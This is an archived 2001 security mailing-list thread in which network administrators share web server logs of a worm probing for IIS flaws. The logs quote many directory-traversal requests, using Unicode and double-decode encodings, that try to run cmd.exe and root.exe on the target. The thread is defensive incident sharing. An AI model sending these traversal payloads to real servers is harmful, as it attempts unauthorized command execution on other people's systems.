Re: CodeBlue finally hitting, or what?

From: Jason Giglio (jgiglioat_private)
Date: Tue Sep 18 2001 - 08:36:35 PDT

Next message: Steve Halligan: "Interesting Scan--Looks like a new worm."

Previous message: Keith.Morgan: "command execution attempts"
In reply to: Portnoy, Gary: "CodeBlue finally hitting, or what?"
Next in thread: Tracey Losco: "Re: CodeBlue finally hitting, or what?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I've gotten 721 hits just today for cmd.exe of some sort.  We run apache so
no worries, but this worm has hit faster than anything I've seen before.

All from the people that share the same class A as us.  This one must scan
it's own class C then B then A first.  (I know I'm probably abusing the
terms, but you all know what I mean)


65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 320
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 320





On 2001.09.18 10:24 "Portnoy, Gary" wrote:
> Greetings,
> 
> I am suddenly seeing hundreds of Unicode traversal requests coming in
> from
> all over the world, many of them from previous CodeRed victims.  I am
> guessing someone changed CodeBlue to make it spread faster, because
> before I
> saw maybe 1 or 2 CodeBlue attempts a day, and so far i've seen at least
> 20
> in the last hour.  Just a a way to help fingerprint it, a few of the
> attempted exploits use the multiple decode vulnerability....
> 
> -Gary-
> 
> 12.27.232.252 - - [18/Sep/2001:10:16:47 -0400] "GET
> /scripts/root.exe?/c+dir
> HTTP/1.0" 404 287 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET
> /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 285 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 326 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 326 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:51 -0400] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
> "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:17:01 -0400] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-"
> "-"
> 
> Gary Portnoy
> Network Administrator
> gportnoyat_private
> 
> PGP Fingerprint: 9D69 6A39 642D 78FD 207C  307D B37D E01A 2E89 9D2C
> 
> 
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management 
> and tracking system please see: http://aris.securityfocus.com
> 
> 
--
Jason Giglio
Information Technology Coordinator, Smyth Companies, Bedford VA
Phone: 540-586-2311x113
e-mail: jgiglioat_private

-----------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Steve Halligan: "Interesting Scan--Looks like a new worm."
Previous message: Keith.Morgan: "command execution attempts"
In reply to: Portnoy, Gary: "CodeBlue finally hitting, or what?"
Next in thread: Tracey Losco: "Re: CodeBlue finally hitting, or what?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 09:45:20 PDT